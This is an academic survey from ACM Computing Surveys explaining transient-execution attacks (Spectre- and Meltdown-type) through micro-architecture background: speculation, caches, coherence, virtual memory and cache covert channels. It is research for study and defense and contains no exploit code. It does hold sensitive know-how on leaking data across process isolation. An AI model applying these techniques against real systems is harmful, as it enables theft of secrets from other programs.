tutorial

Open access

Transient-Execution Attacks: A Computer Architect Perspective

Authors:

Luís Fiolhais,

Leonel SousaAuthors Info & Claims

ACM Computing Surveys, Volume 56, Issue 3

Article No.: 74, Pages 1 - 38

https://doi.org/10.1145/3603619

Published: 06 October 2023 Publication History

PDF eReader

Abstract

Computer architects employ a series of performance optimizations at the micro-architecture level. These optimizations are meant to be invisible to the programmer but they are implicitly programmed alongside the architectural state. Critically, the incorrect results of these optimizations are not scrubbed off the micro-architectural state. This side-effect may seem innocuous. However, through transient-execution, an attacker can leverage this knowledge to obtain information from the micro-architectural state and transmit the data to itself. Transient-Execution is a class of attacks that use the side-effects of executed instructions to leak data. Transient-Execution attacks are split into two categories: speculation-based (Spectre-type) and exception-based (Meltdown-type). A successful attack requires, first, access to the sensitive information, and, second, a transmission channel such that the data can be recovered. Therefore, this survey explains how an attacker can use the state from optimizations in the micro-architecture to access sensitive information from other programs running in the same device; and, once the information is obtained, it describes how the data can be encoded and transmitted in the micro-architectural state. Moreover, it introduces a taxonomy and analyzes defenses for such malicious attacks.

1 Introduction

Micro-Architectural attacks have been an extensively researched topic [17, 82, 109, 112, 115, 165]. Traditional micro-architectural attacks relied on exploiting code that, unbeknownst to the programmer, left remnants of information in the cache hierarchy [109, 180]. In turn, the attacker, aware of this fact, knows how to extract that information out of the state in the cache hierarchy. In this sense, the victim was voluntarily offering that information, i.e., the victim was only vulnerable to micro-architectural attacks if they executed the required code sequences and updated their architectural state to reveal information. If the attacker sought to force a victim into executing certain code paths, the attacker had to gain control of the Program Counter (PC), traditionally through a memory vulnerability, and then execute Return Oriented Programming (ROP) [128] or Jump Oriented Programming (JOP) [19]. This all changed when transient-execution attacks were introduced. Transient-Execution attacks showed that, even when the victim executes a code sequence which does not update the architectural state, it can still reveal sensitive data. After the victim’s execution, an attacker can read the victim’s data that is left in the micro-architectural state through side-effects of executed instructions.

Distinguishing between updates at the architectural and micro-architectural levels is key to understanding how transient-execution attacks differ from traditional micro-architectural attacks. Defining a computer architecture requires specifying an Instruction Set Architecture (ISA), which defines a set of instructions that enable the programmer to modify the architectural state. The architectural state is defined by the contents of the register file and the external memory. An implementation of the ISA guarantees the behavior of the provided instructions. A micro-architecture corresponds to a concrete implementation of an ISA. There are no restrictions on how the ISA is implemented. As such, the implementer can design extra micro-architectural states to achieve better performance. The micro-architectural state is a superset of the architectural state that is invisible to the programmer—it is not defined by the ISA.

Transient-Execution attacks leverage the fact that the micro-architectural state is shared between threads and that each thread modifies the shared state in a unique way. One can design programs that, through measurements such as memory access latency, can infer how this shared state has been modified by other threads. In general, a Transient-Execution Attack is split into two components: (1) a method to access a buffer or memory address in an execution path which will not update the architectural state, and (2) data encoding from step (1) into the micro-architectural state such that the information can be recovered later. It is important to distinguish Transient-Execution attacks from side-channel attacks. Even though Transient-Execution attacks use side-channel attacks, the unique characteristic of Transient-Execution attacks is that they rely on side-effects of executed instructions, which may or may not update the architectural state, to gain access to data and transmit it to a micro-architectural state that is shared between threads [81]. Transient-Execution attacks are a recent field, as such the community is actively researching methods and techniques to identify and mitigate attacks. Published proposals range from hardware only [3, 12, 33, 172], to software only [8, 11, 148], and in between [49, 88, 185].

The goal of this survey is to provide an overview of transient-execution attacks and corresponding defense mechanisms through the lens of computer architecture. The information provided herein is targeted at new readers of this field that aims to develop and design micro-architectural components that are protected against transient-execution attacks. Therefore, the descriptions and examples provided feature a generic micro-architectural model not tied to any particular ISA or micro-architecture. This is done for these main reasons: (1) tying explanations to a single micro-architecture narrows the understanding in which each attack or defense can be applied; (2) decoupling from a known ISA or micro-architecture allows the isolation of the primitives that are responsible for an attack/defense; (3) analyzing each attack/defense detached from an ISA or micro-architecture deepens the understanding of the threat model of the system. However, it must be noted that due to the generic descriptions provided herein, some attacks will not work out-of-the-box. This occurs because most of the research in this field focuses on the x86 architecture and Intel’s micro-architecture. Nevertheless, it is the belief of the authors that the general descriptions provided can be of use as a starting point for research in attacks and defenses in different micro-architectures.

This survey explains the micro-architectural components that are traditionally exploited in transient-execution attacks (Section 2) and how the usage of speculation connects them (Section 3). Section 4 explains multiple methods on how data can be encoded and transmitted in the cache hierarchy under a speculation window. With that basis, the original transient-execution attacks (Spectre-BTB, Spectre-PHT, and Meltdown-US) are explained and how they have been enhanced (Section 5). Section 6 discusses and compares the different point-of-views used in state-of-the-art defense proposals, and Section 7 concludes the article. This survey makes the following contributions.

—

Provide a bottom-up introduction to transient-execution attacks. Starting with the primitives in modern micro-architectures, all the way up to the original transient-execution attacks. This survey explains, describes, and contextualizes the basic concepts and ideas thoroughly;

—

Present a point-of-view from a computer architecture perspective. The surveys in this area focus more on the practical aspects of the attack, e.g., how to attack commodity systems or how fast an attack is triggered, instead of the micro-architectural primitives behind them and their impact in a generic architecture model [21, 23, 91];

—

Use a generic micro-architectural model to describe transient-execution attacks. The state-of-the-art tends to focus on x86 due to the market dominance it possesses;

—

Explain how speculation connects all components in the micro-architecture;

—

Give a detailed and thorough explanation of the cache hierarchy, and how data is encoded and transmitted in it;

—

Show a micro-architectural explanation of the original Spectre-PHT, Spectre-BTB, and Meltdown-US attacks, and how they have been enhanced upon;

—

Propose a taxonomy of the current state-of-the-art defenses for transient-execution attacks.

2 Background: Modern Computer Architectures

Modern computer architectures employ optimizations that transparently alter the expected behavior of the programming model. The expectation is that, given a sequence of instructions, they will be executed by the core one at a time in program-order. Traditional programming models define the architectural state with the contents of two levels of memory: a fast and small register file, and a slow and large external memory. It is the Operating System (OS) responsibility to share the system’s resources between different executing programs. Namely, the OS guarantees that one running program cannot modify the architectural state of another running program. The external memory is a shared resource between all currently executing processes, and is updated on every store. A load will always read from the most recent store to the same address. The micro-architecture may contain multiple cores to execute different programs or multiple instances of a program in parallel. The key concept in all optimizations is that they aims to “hide” the latency of a high-latency instruction while maintaining the expected programming model and architectural results. This section introduces the core background concepts for modern computer architectures and how they run askew from the expected behavior of the programming model.

2.1 Core Execution Architecture

From the programming model, it is expected that a program executes instructions and updates the architectural state in program-order. Each instruction only starts after the previous one has updated the architectural state. However, executing this program in this form constrains its performance as the latency of the program would be the sum of the latency of all instructions. The architecture of such a core is referred to as multi-cycle.

The architecture of the core is split into two components: the frontend and the backend. The frontend is tasked with fetching instructions from memory and feeding instructions to the backend. The backend is tasked with executing the instruction provided by the frontend and updating the architectural state. The backend can be further split into three steps: execute, write-back, and commit. The execute stage moves the instruction from the frontend to the backend and dispatches the instruction to functional units to be executed. The write-back stage stores the results of completed instructions from the execute stage. The commit stage applies the results of the completed instructions from the write-back stage to the architectural state.

To improve performance, the datapath of a core is split into multiple independent logical stages. At the end of each stage, there is a register such that the critical path of the core is shorter. Using this scheme, the core is a series of pipeline stages where each performs a small portion of the work required to apply the instruction to the architectural state. As a result, the latency of each instruction overlaps with the latency of other instructions already in the pipeline. Hence, the smallest latency of a program is achieved when all stages of a balanced pipeline are processing instructions in program-order concurrently.

A performance optimization often employed in a core is to execute independent instructions in parallel. In this instance, the perfect latency of a program would be equal to the instruction stream with the largest dependence chain. In general, any two or more streams of instructions, that have no dependencies between them, can be executed in parallel. Cores that can execute more than one instruction in parallel are referred to as superscalars. The more instructions in parallel that can be executed, the higher the performance of the core is [52]. This metric is referred to as Instruction-Level Parallelism (ILP) and is a general performance guideline for a core [52]. Each instruction may complete execution, or write-back, Out-of-Order (OoO) (in non-program-order). However, younger instructions in program-order cannot update the architectural state before older instructions as that would break program-order and possibly dependence chains (write-after-write and write-after-read hazards) [30, 114]. Recall that the commit stage controls the order in which instructions are applied to the architectural state from the write-back stage. To maintain these properties, another structure, the Reorder Buffer (ROB), allows to commit the instructions in program-order.

To further improve performance, instructions that have their dependencies and functional unit ready should be able to execute. Order is a non-factor as the ROB guarantees that the instructions are applied to the architectural state in-order. Therefore, the execute stage can be decoupled into two stages: issue and dispatch. The issue stage moves an instruction from the frontend to the backend. The dispatch stage moves an instruction from a backend buffer into a functional unit. A core is considered in-order when instructions are only issued to the execution backend and dispatched when all operands are available and there is no structural hazard [114]. A core is considered OoO when instructions are issued regardless of operand availability. The execution backend will then dispatch the instruction when all operands are available and there are no structural hazards [52]. In OoO cores, instructions can execute before other older instructions in program-order. In in-order cores, instructions execute in program-order but they can complete OoO. Using the different execution backends, transiently-executed instructions can be defined. Transiently-Executed instructions are instructions with an execution that leaves measurable side-effects in the micro-architectural state even when they have not been committed or are not going to be committed to the architectural state.

2.2 Cache Hierarchy

Memory instructions (loads and stores) incur a large latency due to accessing a relatively slow external memory. A core would have to overlap the execution of multiple instructions to “hide” the latency of a memory access. This may not be possible due to dependencies, especially in in-order designs, and the core will stall, waiting for a memory response.

To reduce the latency of memory operations, multiple levels of cache are inserted between the core and the main memory. Caches increase their capacity and access time the closer to main memory they are. They are self-managed memories that attempt to predict what data will be reused in the near future and keep it in a cache. A cache is organized into sets containing one or more ways [114]. Each way contains one cache line, typically 64 bytes. When a set is fully occupied, a replacement policy selects which way will be evicted from cache [114]. A cache access has three steps (Figure 1): ① hash the memory address to obtain a pointer to a set; ② compare the input address with the stored addresses in each way; ③ if there is an address match (hit) fetch data from that way, else (miss) fetch data from a higher level memory/cache and one way from the set might have to be evicted if the set is fully occupied.

Fig. 1.

In order to service the core with multiple memory requests, a cache needs to keep operating when one or more misses occur [52]. To do so, on a miss, the cache controller allocates a Miss Status Hold Register (MSHR) to handle the request asynchronously [84, 135, 161]. The MSHR will handle communication with higher-level memories to obtain the missing cache line, and deal with the eviction. There are two types of evictions depending on if the cache line has been modified by a store (dirty) or not (clean). An evicted dirty cache line needs to update the next high-level memory, whereas a clean cache line can be silently dropped. When the missing cache line is returned, the MSHR inserts the new line in the cache and returns the data.

Using a cache hierarchy, most memory accesses are handled by the cache instead of the main memory. Therefore, the latency of memory accesses is shorter which results in less stalls in the core. By allowing the cache to handle most memory accesses, the cache needs to define when writes are applied to the next higher-level memory. There are two write policies available [75]:

—

Write-Back (write-allocate): a write first triggers a load of the address to the cache if it is not already cached, and then the write is performed. When the cache line is evicted, if its contents have been modified, it will be written to the next higher-level memory/cache;

—

Write-Through (write-no-allocate): a write is always written to the next higher-level memory regardless of its presence in the cache. If the address is also in the cache, then the write is also applied to the cache.

Therefore, missing loads will always allocate a way in the cache. Depending on the write policy used, missing stores may also allocate a way in the cache [75]. There are two allocation strategies: write-allocate and write-no-allocate. Write-Allocate allocates lines on write misses; Write-No-Allocate does not allocate lines on write misses. Logically, write-back is used with write-allocate, and write-through with write-no-allocate. However, it is theoretically possible to use any combination of allocation and write policies.

Common modern micro-architectures have two core private cache levels (L1 and L2), and a shared third level, Last Level Cache (LLC), among all cores (Figure 2). For multi-threaded programs that share data, one thread needs to access an address that is cached in another core’s private cache. The thread requesting the data is in one of two scenarios depending on whether the address was written to or not. If the data has not been updated, the requesting thread can fetch it from memory or the cache hierarchy. If the data has been updated, the updated value may only be available in the cache hierarchy.

Fig. 2.

To find and retrieve the requested data, the cache hierarchy must solve two problems: first, it must know if that address is currently cached; second, it must know which cache contains the data corresponding to the address. Since all requests traverse the hierarchy from lower levels to high levels looking for the memory address, a higher-level cache can duplicate data and/or store location information. Therefore, in Figure 2, every cache level from the L2 or higher defines an inclusion policy. There are three common inclusion policies: Inclusive, Non-Inclusive Non-Exclusive, and Exclusive.

—

Inclusive [14, 90]: the higher-level cache duplicates the data present in all lower-level caches. A missing load or store allocates a way with the same address in all cache levels. The allocations may trigger different address evictions from all cache levels. Evicting an address from a high-level cache that is cached in lower-level caches triggers an eviction of the same address in all lower-level caches (Example in Figure 3(a)). The inclusive policy has been used in Intel’s L2 caches, where the L2 contains the contents of the L1 data cache, and in Intel’s LLCs, where the LLC contains the contents of all lower-level caches [90]. AMD’s Zen L2 caches are also inclusive of the L1 data cache [39];

—

Non-Inclusive Non-Exclusive [71, 176]: the higher-level cache may or may not duplicate the data present in all lower-level caches. A missing load or store allocates a way with the same address in all cache levels. The allocations may trigger different address evictions from all cache levels. Evicting an address from a high-level cache that is present in low-level caches does not trigger evictions of the same address in all lower-level caches (Example in Figure 3(b)). The non-inclusive non-exclusive policy has been used in Intel’s (Skylake-SP) and AMD’s (Zen 2 and Zen 3) LLCs [39, 176];

—

Exclusive [14]: the higher-level cache does not duplicate the data present in all lower-level caches. A missing load or store allocates a way with the same address only on the L1 cache. If the allocation in the L1 cache triggers an eviction, the evicted line will be allocated in the next higher-level cache. If the next higher-level cache triggers another eviction due to the previous allocation, the same process repeats until either an empty way is found or the external memory is reached. Evictions from higher-level caches do not trigger evictions in lower-level caches (Example in Figure 3(c)). The exclusive policy has been used in AMD’s Opteron L2 cache, where the L2 cache does not contain the contents of the L1 data cache [4].

Fig. 3.

2.3 Memory Consistency

In multi-threaded systems, multiple threads perform operations on shared memory. A memory consistency model indicates which outcomes are allowed and which are not. The outcomes allowed determine the type of optimizations a micro-architecture can employ when executing memory operations. Specifically, memory models define what kind of memory operation reorderings are allowed. Out-Of-Order designs benefit from reordering memory operations as it allows support for multiple in-flight memory operations in parallel, thus overlapping the latency of multiple memory operations, which improves performance.

There are three main memory consistency models: Sequential Consistency (SC) [85], Total Store Order (TSO) (x86 [10, 65, 110], and RVTSO [126]), and weak order (IBM POWER [94], ARM [12, 94], and RVWMO [126]). The three models are ordered from strongest to weakest. The strongest model (SC) does not allow any type of reordering between memory operations, i.e., memory operations are executed in program-order. TSO allows store-load reordering in the same thread. The weakest models allow any kind of reordering as long as dependencies are maintained.

In practice, simplifying, the key difference between SC and the weaker counterparts is the addition of a store buffer [110, 153]. The store buffer holds committed stores that have not been applied to the memory hierarchy. Adding a store buffer to the micro-architecture is an important optimization, especially for in-order designs, as it allows the core to continue executing instructions before the store is applied to memory. Such a micro-architecture needs to check the store buffer before dispatching any load to the memory hierarchy. If there is an address match, the micro-architecture will fetch the data from the store buffer instead of the memory hierarchy. The order in which stores are drained from the store buffer (write combining [10, 65] and silent stores [65]) to memory and the order loads are dispatched to memory further separates TSO from weaker models. Memory order can be enforced using fence instructions regardless of the reordering performed by the micro-architecture. Fence instructions must guarantee that every older memory instruction must complete and every younger memory access must not start prior to its completion. The same ordering enforcement is applied to Read-Modify-Write (RMW) instructions.

2.4 Cache Coherence

Cache coherence is tasked with achieving a shared global state between all caches in a hierarchy. Since only stores modify memory, coherence protocols can be defined by how and when stores are performed in the cache hierarchy. A coherence protocol serializes all stores to a cached address and ensures that all caches in the hierarchy see the stores in the same order [106]. Therefore, the definition of the coherence scheme is hinged on “propagating stores” to other cache lines. The cache coherence protocol defines two mechanisms in order to achieve this: how the stores are propagated and when they are propagated.

Propagating a store is performed by sending invalidation or update requests. An invalidation request invalidates the cache line at other caches. A thread access to a coherence invalidated line results in a coherence miss in the cache. On a coherence miss, the cache will issue a request to access the latest value of the address from another cache. An update request updates the cache line at other caches with the data from the store that created the request. In this case, there are no coherence misses as the cache is always kept up to date. Industry implementations favor invalidation requests as they require less physical resources to transmit the requests.

Memory consistency models have requirements for store atomicity that the cache coherence implementation must enforce [12, 65, 126, 183]. Either the store completes after being propagated to all caches simultaneously (atomic), or the store completes after being applied to the local L1 cache regardless of the propagation status to other caches (non-atomic).

There have been multiple proposals for coherence protocols with different tradeoffs, they are mostly atomic invalidation-based: MSI, MESI, MOSI, MOESI, and MESIF [2, 38, 95]. The simplest protocol is the MSI protocol. Each cache line keeps metadata on its coherence state. The properties of each state are: the Modified state allows writes and reads to be performed to the cache line and guarantees that all other copies of the same cache line are invalidated; the Shared state allows reads to be performed and other copies must be in the shared or invalidated state; and the Invalid state does not allow reads or writes, other copies of the same cache line may exist in shared or modified state. Changing coherence state of a cache line causes copies of the same cache line to also change state. For example, when a core requests a cache line in M state, regardless of the initial state, all other copies of the same cache line will be invalidated. When a core requests a cache line in S state, any other copy of the same cache line that is in M state will change state to S and any other copy of the same cache line in I state remains unchanged. Figure 4 shows all these state transitions for the MSI protocol.

Fig. 4.

2.5 Virtual Memory and Process Isolation

Virtual memory splits physical memory into different virtual memory spaces where each space is unique to each process. The virtual space contains a set of physical memory regions that can be accessible by a process. This is achieved by providing a translation layer between the process’ addresses (virtual) and the actual memory addresses (physical). To achieve this kind of translation, memory is split into pages that may have different granularities, the minimum typically being 4KiB [10, 58, 127]. On a memory access, translating an address involves traversing a tree of pages (page table walk). The path taken in the tree is given by the virtual address (Figure 5(a)). Each page contains either pointers to the next step in the translation mechanism or the final translation, in Page Table Entries (PTE). The page table walk requires multiple accesses to memory to visit the pages in the various translation levels, which is a high-latency procedure. To avoid traversing the tree every time a memory access is performed, the micro-architecture keeps a cache hierarchy of recently used translations, the Translation Lookaside Buffer (TLB) [114]. Figure 5 shows an example virtual memory system with 32-bit virtual addresses, 4KiB pages, and 4B PTEs, where a translation is performed (Figure 5(a)) using the PTEs shown in Figure 5(b).

Fig. 5.

Modern commodity operating systems implement process isolation through separate virtual memory spaces for each process. Each page contains metadata on the type of memory accesses allowed (typically read, write, or execute) and the privilege levels (typically user or supervisor) required to perform it. A virtual memory space is private and unique to each process. Attempting to access a non-mapped address, an address which resides in a page with higher privilege levels, or a page that does not support the requested access type will result in a micro-architectural error which, when handled by the OS, results in a process termination.

3 Speculation

The process of speculation involves a prediction over a set of outcomes and a subsequent verification. For example, when the progress of a program depends on the outcome of a high latency instruction, speculation can be used to predict the outcome of the instruction before its result is available allowing speculatively continued execution. A correct prediction avoids the core having to stall for the result before proceeding. However, if the verification concludes that a misprediction occurred, the core will have to rollback and restart from the state immediately before the instruction that performed the prediction.

The fundamental idea behind speculation is that prior to correctly verifying the prediction, any effect generated by the instruction(s) in the prediction is(are) not visible to the architectural state. Otherwise, the program would generate incorrect results. However, as this section shows, certain portions of the micro-architectural state can be programmed implicitly. Specifically, instruction types which speculate are programming the micro-architectural state. It is from the implicit programming of micro-architectural state that speculation introduces security flaws. Speculation is employed in many areas of the core. Herein, three areas are discussed: instruction stream, memory dependencies, and exceptions.

3.1 Instruction Stream

According to the Von Neumann type of operation, the PC is a register that holds a memory pointer to the next instruction to be executed. Any instruction in the ISA updates the PC. Two types of instructions will update the PC in different ways. Non-control instructions select the next instruction to be executed implicitly, e.g., $PC \leftarrow PC + n$, with n being the number of bytes that encode the instruction. Control instructions or jumps, however, can write any value to the PC, e.g., $PC \leftarrow x$. Within control instructions, there are two types of jump instructions, unconditional and conditional. Conditional control instructions are predicated instructions: a condition needs to be verified for the jump behavior to be defined. Unconditional control instructions always force the value of the PC. Moreover, a control instruction may calculate the resulting PC differently. Direct jumps use the data that is encoded in the instruction to reach the target address, whereas indirect use data that resides in the architectural state (register or memory).

To know which instruction should be fetched and executed, the core must first decode the current instruction to assert if it is a control instruction. If the decoded instruction is a control instruction, the instruction would have to be executed to obtain the target address and, in case of a conditional jump, its predicate verified. Any core that fetches instructions before decoding all current instructions or executing all previous control instructions is speculating over the value of the PC. Direct jumps know their target addresses early in the pipeline (usually, at the decode stage), while indirect jumps do not. Indirect jumps need to execute to get the target address of the jump. Furthermore, if any of these jumps are conditional, the jump can only be performed after the condition is verified. Deciding the target of the jump and if the jump is taken/not-taken is a high-latency operation. Therefore, to have a high instruction throughput, the core needs to fetch the correct instruction stream ahead of time.

Since the results of the jumps vary per instruction type, modern cores employ different prediction systems [96, 140, 143]. Conditional direct jumps have their target address available early in the pipeline, thus it is best to predict over the outcome of the predicate. Indirect jumps only compute their target address on execution. If the indirect jump is also conditional, the result of the predicate will also only be available on execute. Thus, indirect jumps need to predict over the target, and, if they are conditional, the result of the predicate. Note that, micro-architectures with a high decode latency do not differentiate between direct and indirect jumps [43, 129]. In these instances, they will always perform a prediction on both the target address and the predicate. Two structures can be used to predict over the instruction stream:

(1)

Branch Target Buffer (BTB): each entry stores the target address and a tag to match with the current jump address. Its construction is exactly like a cache. There may be multiple levels of BTBs;

(2)

Pattern History Table (PHT): each entry stores a prediction state indicating if the target address should be written to the PC (taken jump) or not (not-taken jump). The state indicates the confidence of the prediction and its decision. Traditional implementations use a saturating counter [37, 113, 139] whereas more recent implementations use a neural network [72, 73]. If the prediction has low confidence or the prediction is not-taken, the next instruction is fetched from the subsequent address.

The method used to perform the predictions can be further split into two categories depending on what information is used to perform the prediction. A local predictor uses the current value of the PC and the history of this jump to perform the prediction. A global predictor uses information from previous jumps and the current value of the PC. To obtain this information, a new buffer is added, the Branch History Register (BHR), which is composed of the concatenation of the outcome of the previous n jumps. The BHR acts as a n-bit shift-register [51]. The outcome of a jump is shifted into the BHR when the instruction is committed. A local predictor has a table that stores multiple BHRs indexed by the memory address of the jump. The selected BHR indexes the PHT. A global predictor shares the same BHR for all jumps. There are multiple constructions on how the PHT can be indexed. The two most popular are: the XOR result between the BHR and the memory address of the jump (Gshare) [96], and a concatenation of the jump memory address and the BHR (Gselect) [113]. Besides the constructions described herein, there are others that have been adopted [181]. Regardless of the predictor used, the instruction fetch uses the output of the prediction unit and decides to take the target address from the BTB or not. Figure 6 shows an example of local and global predictors with 4-bit BHRs and a 1-bit prediction state. In the literature, the number of bits in the BHR is referred to as m and the number of bits in the prediction state is referred to as n [181]. Predictors are often referred to their (m, n) combination. The examples in Figure 6 are a (4, 1) predictor.

Fig. 6.

Micro-Architectures that deploy both local and global prediction systems have to decide which prediction result will be used. To decide, another predictor is added on top of the local and global predictors. A predictor that decides which predictor (local or global) will be used is called a metapredictor [96]. The metapredictor is similar to a PHT. The prediction result of the chosen predictor is compared with the result of the jump and the result of the metaprediction is updated. Similarly, the metapredictor can use a saturating counter or a neural network. Prediction systems that make multiple predictors compete for a result are called tournament predictors [76, 96]. Using all of these primitives, a prediction system can be built with multiple types of predictions with multiple levels of predictors all competing with each other. Figure 6(a) shows a tournament predictor example.

Each jump type programs the BTB, PHT, and BHR differently. The modifications are always applied on commit regardless of verification success. The BHR is updated with the result of the jump by shifting in the outcome: 0 as not-taken and 1 as taken. There are two kinds of mispredictions: mispredicting on a decision (taken/not-taken), or on a target. On a target misprediction, the target address is updated. On a decision misprediction, the confidence will increase or decrease based on the outcome of the predicate. The metapredictor is updated depending on the verification success of the prediction made. If the metapredictor used the correct predictor, the confidence will increase toward the predictor used; otherwise, the confidence will increase toward the other predictor.

The Return Address Stack (RAS)/Return Stack Buffer (RSB) is an indirect jump predictor that stores memory pointers to function callers in order to speed up function returns [145]. The stack buffer operates through push and pop operations. Whenever a function is called, the pointer to the instruction after the jump is pushed to the stack. When the same function returns to the caller, the micro-architecture pops the stack and jumps to the address of the instruction that was previously pushed. The speculation in this mechanism occurs when a call or return are detected. A mis-speculation occurs when the popped address does not match the target address of the return.

3.2 Memory Dependence

The memory addresses accessed by instructions are computed at runtime. Therefore, there are scenarios where memory operations cannot be dispatched to memory due to an address’ long dependence chain or the address depends on a high latency instruction. This scenario may cause a younger memory operation to be dispatched prior to an older memory instruction, where both operate over the same address. This results in a memory order violation and will trigger a rollback which impacts the performance of the core [27, 99]. Memory dependence predictors, or address disambiguation units, aims to avoid memory order violations by predicting over the dependencies of multiple memory instructions. Specifically, they look to match up loads and stores, and forward the result of stores to loads. The latter is an important optimization as it reduces the number of cache accesses in the core and the load’s latency. The predictor is successful when it correctly allows the OoO execution of multiple memory instructions which do not share the same address, and stalls a load that will operate over the same address as a previous store [27, 99].

A naive prediction structure in an OoO core is to dispatch all memory operations to the cache hierarchy as soon as their operands are available, i.e., the core predicts there are never any dependencies between memory operations [27, 99]. In this scheme, the Load Store Unit (LSU)/Load Store Queue (LSQ) keeps two queues, one for all in-flight loads and another for all in-flight stores. When stores are issued they will have to check these buffers. A store checks the loads queue for any younger in-flight load to the same address. If there is a match, the core rollsback up to the matching load and forward the result of the store to the matching load. Loads also check the load queue for younger in-flight loads to the same address. This is done because some memory models do not allow loads to be reordered with each other even if there is no intermediate store (more details can be found in [106]). In case the memory model disallows this type of reordering and if there is a match, the core rollsback up to the matching load.

An improvement over the prediction structure is to start storing the memory addresses for every set of mis-predicted memory instructions. Specifically, store the links between stores and their dependent loads, and loads and their dependent loads [27, 99, 138, 146]. The predictor is programmed by using the virtual address and partial information from the physical address [27, 66, 70, 100, 101, 146]. The prediction verification occurs when the address of a memory operation is processed, the computed address is compared with the predicted address. If the addresses are different, a rollback is triggered [36, 70, 100].

3.3 Exceptions

Exceptions correspond to errors that occur during instruction execution. They serve to inform the execution environment that an error occurred and it should be handled. The exception is handled when the instruction which created the exception is committed. Multiple components in the core can trigger exceptions, such as: the floating-point unit [10, 12, 64, 65, 126], the vector unit [10, 12, 65, 67, 126], the division unit [10, 65], the load-store unit [10, 12, 65, 126], and the instruction fetch unit [10, 12, 65, 126]. This subsection focuses on exceptions triggered by memory operations (load-store unit and instruction fetch unit) because of the core’s interactions that occur while handling virtual memory.

All speculation forms described in the previous sections have assumed that the addresses accessed are always mapped to the virtual memory of the process and the pages accessed have the correct set of permissions to perform the operation. On a system with virtual memory support, a memory operation, either an instruction fetch or data access, requires three verifications to be performed before committing, as in Listing 1: the core must verify if the page is mapped in the process’ memory, if the page is present in memory, and if its permissions allow such an operation.

Translating a virtual address to a physical address is a high-latency task. It requires a page table walk to obtain the physical address, setting the access bit and possibly the dirty bit of the page, and a check for the page’s permissions. Moreover, the latency is significantly higher if the page is not present in memory, which will require the operating system to fetch the page from disk to memory and resume execution of the process.

Cores assume that most memory accesses will access pages that are in memory, their translations are in the TLB, and the page has the correct set of permissions to allow the access. As such, there is a fast path to access the translation (TLB) and the permissions. To further exploit these fast paths, L1 caches can be virtually indexed and physically tagged [36, 166]. An example interaction would be checking the permissions and obtaining the translation in parallel [87]. As soon as the physical address is obtained but before the permission check completes, the memory access can be performed. The result of this memory access can be forwarded to other dependent instructions even if the permission check fails. This is possible because the result of the load will never be architecturally visible as a permission check fail will trigger an exception.

Listing 1.

3.4 Side-Effects

From the micro-architectural point-of-view, speculation only operates in the domain of the hardware thread that has performed the prediction. The commit stage gates the effects of speculation: if the prediction is correct the effects are made visible, otherwise they are not. However, even though within the architectural domain the effects of the speculation are squashed, some remnants of speculation can still be obtained from other parts of the micro-architecture. Therefore, there are instruction types which, besides the ISA defined architectural behavior, also implicitly modify the micro-architectural state regardless of outcome of the speculation. Table 1 shows which instruction types program which component.

Table 1.

Instruction Type	Affected Micro-Architectural Component
Control Instructions	PHT [81], BHR [15], BTB [81], RAS [83], Cache Hierarchy [42, 90], Coherence Network [3, 177], MSHRs [135, 161], TLBs [158, 168], Network-on-Chip (NoC) traffic [111], DRAM Buffers [116]
Memory Instructions	Memory Dependence Prediction Unit [54, 159], Cache Hierarchy [42, 90], Coherence Network [3, 177], MSHRs [135, 161], TLBs [158, 168], NoC traffic [111], DRAM Buffers [116]
Integer/Floating-Point/Vector Instructions	Functional Unit Occupation [18]

Table 1. Components Programmed by Side-Effects of Each Instruction Type

As the cache hierarchy is a transparent resource to the core, the effects of speculative memory and control instructions are not wiped on commit. The data a core uses always comes from the L1 cache. Therefore, the results of mispredictions change the global state of the cache hierarchy (allocate cache lines, evict cache lines, change the state of the replacement policy of a set, etc): mispredicted branches and jumps (Section 3.1), mispredicted address dependencies (Section 3.2), and mispredicted exceptions (Section 3.3). All memory accesses and/or control instructions that stem from these mispredictions will also change the global state of hierarchy [81, 87].

Similarly to the cache hierarchy, the coherence scheme is also transparent to the cores. Mispredictions cause coherence traffic to flow through the cache hierarchy [3, 69, 172, 178]. Although the traffic is created by speculative instructions, it still changes the state of the global cache coherence, e.g., a cache line in a modified/exclusive state in a core is modified to a shared state when a load instruction is executed through a misprediction from another core.

Most modern cache hierarchies use the write-back write-allocate write policy [36, 39]. Any memory operation that misses on a cache, triggers a load of the cache line from a higher level memory to the cache that issued the miss. Therefore, MSHRs are allocated every time a memory access misses on a cache level. When a cache level runs out of MSHRs, memory accesses cannot be dispatched to the cache hierarchy. Thus, the usage of MSHRs may reveal the memory access pattern or the contents accessed by the core [135, 160].

The cache hierarchy contains all forms of mis-speculation since the core will issue prefetch requests for data and coherence that have not been committed yet [42]. A load prefetches a cache line with coherence read permissions prior to commit. A store prefetches a cache line with coherence write permissions prior to commit. This is a common technique in designs with OoO execution to overlap the latency of the memory access with other instructions. The core verifies the speculation of loads by checking for a cache line hit when committing it. For a store, the core checks for a cache line hit and if the cache line has coherence write permissions. Besides the cache hierarchy, other components are also implicitly programmed such as the DRAM buffers [116], execution ports [18], system interrupts [28], and micro-op caches [124].

4 Retrieving DATA from Speculation Side-Effects in the Cache Hierarchy

Every program leaves remnants of transient execution throughout the cache hierarchy. However, those remnants have little to no value if they cannot be identified and if the data used within the transient execution cannot be recovered. An attacker wants to recover the information resulting from a victim transient execution that circumvents the process isolation provided by the virtual memory. This section focuses on identifying instruction sequences that build communication channels in the cache hierarchy such that the attacker can recover this information. Note that, the cache hierarchy is not the only component from which communication channels can be built from. There has been researched on building communication channels through DRAM buffers [116], contention in execution ports [18, 81], system interrupts [28], and micro-op caches [124]. However, this section focuses solely on the cache hierarchy because it is a common component of all modern micro-architectures, the channel is simple to deploy (requires few memory accesses), and can be local to the same physical core or remote across different physical cores.

To obtain data, a communication channel is built using one exploited component of the cache hierarchy. The communication channel has a receiver and a sender. In general, the communication channel is built using three steps: ① the receiver sets up the state, ② the sender may or may not modify the previous state, and ③ the receiver checks the state to infer if and what data was transmitted (Figure 7). The receiver, through program analysis, knows which addresses will be accessed by the sender. In order to check if those memory accesses have been performed, the receiver will setup a specific state in the cache hierarchy ①. If the sender accessed the expected addresses, the state setup by the receiver will change ②. The receiver can infer what data was transmitted from the modification of the previously setup state ③. The modification of the state is identified by the high/low latency of certain memory accesses.

Fig. 7.

Listing 2.

